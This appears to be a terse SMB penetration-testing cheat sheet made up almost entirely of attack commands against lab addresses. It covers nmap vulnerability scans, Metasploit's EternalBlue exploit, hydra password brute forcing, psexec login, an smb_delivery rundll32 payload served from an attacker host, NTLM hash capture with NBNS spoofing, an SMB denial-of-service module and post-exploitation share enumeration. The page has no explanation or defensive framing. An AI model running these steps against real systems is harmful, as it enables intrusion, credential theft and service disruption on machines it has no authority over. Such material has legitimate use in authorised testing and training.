nmap -p 445 -A 192.168.1.101
nmap -sV -sC -vv -oN nmap.txt 10.5.27.180
nmap --script smb-vuln* -p 445 192.168.1.101
use exploit/windows/smb/ms17_010_eternalblue
msf exploit(ms17_010_eternalblue) > set rhost 192.168.1.101
msf exploit(ms17_010_eternalblue) > exploit
SMB login via Brute Force
hydra -L user.txt -P pass.txt 192.168.1.101 smb
use auxiliary/scanner/smb/smb_enumusers
msf auxiliary(smb_enumusers) > set rhosts 192.168.1.101
msf auxiliary(smb_enumusers) > set smbuser raj
msf auxiliary(smb_enumusers) > set smbpass 123
msf auxiliary(smb_enumusers) > exploit
PsExec – to connect over SMB
use exploit/windows/smb/psexec
msf exploit(windows/smb/psexec) > set rhost 192.168.1.101
msf exploit(windows/smb/psexec) > set smbuser raj
msf exploit(windows/smb/psexec) > set smbpass 123
msf exploit(windows/smb/psexec) > exploit
Rundll32 One-liner to Exploit SMB
use exploit/windows/smb/smb_delivery
msf exploit(windows/smb/smb_delivery) > set srvhost 192.168.1.109
msf exploit(windows/smb/smb_delivery) > exploit
SMB Exploit via NTLM Capture
use auxiliary/server/capture/smb
msf auxiliary(smb) > set srvhost 192.168.1.109
msf auxiliary(smb) > set johnpwfile /root/Desktop/
msf auxiliary(smb) > exploit
auxiliary/spoof/nbns/nbns_response
msf auxiliary(nbns_response) > set spoofip 192.168.1.109
msf auxiliary(nbns_response) > set interface eth0
msf auxiliary(nbns_response) > exploit
SMB DoS attack
use auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop
msf auxiliary(ms10_006_negotiate_response_loop) > set srvhost 192.168.1.106
msf auxiliary(ms10_006_negotiate_response_loop) > exploit
Post Exploitation
use post/windows/gather/enum_shares
msf post(enum_shares) > set session 1
msf post(enum_shares) > exploit
File Sharing
smbexec.py
smbclient
smbclient -L 192.168.1.108